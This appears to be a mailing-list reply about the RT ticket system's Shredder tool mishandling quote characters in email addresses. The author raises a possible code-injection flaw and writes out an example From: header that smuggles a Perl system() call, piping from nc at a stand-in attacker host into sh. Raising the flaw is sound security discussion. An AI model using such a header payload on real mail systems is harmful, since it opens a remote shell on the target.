> Shredder doesn't like when an email address contains either a single-
> or double-qoute.
An email address, or the name associated with an email address? If it
really is broken enough to get upset when an email address includes
unbalanced quotes, it's, well, broken; "\(*&$%\""@example.com is a
perfectly good email address, as is '^#&!`|@example.com. (Some people
have even used such addresses, and find they don't get picked up by
spammer scrapeware - a useful property for email addresses to have.)
Even if it's the associated name, I'd call that somewhat broken. I
know someone who uses "Patrick O'Reilly" as the name portion of his
email address (not coincidentally, that's his name).
> Understandably so considering this messes with Perl and makes it look
> for a closing, matching mark.
I find that extremely disturbing, because it implies that RT is
encountering these things in contexts where its string parsing code is
kicking in. This makes me wonder if perhaps a mail bearing a header
like
From: "; system('cat /dev/null | nc evil.cracker.example.org 12345 | sh');
$dummy = " <[EMAIL PROTECTED]>
would do something nasty. (It would even be legal from an email point
of view.)
/~\ The ASCII der Mouse
\ / Ribbon Campaign
X Against HTML [EMAIL PROTECTED]
/ \ Email! 7D C8 61 52 5D E7 2D 39 4E F1 31 3E E8 B3 27 4B
_______________________________________________
http://lists.bestpractical.com/cgi-bin/mailman/listinfo/rt-users
Community help: http://wiki.bestpractical.com
Commercial support: [EMAIL PROTECTED]
Discover RT's hidden secrets with RT Essentials from O'Reilly Media.
Buy a copy at http://rtbook.bestpractical.com
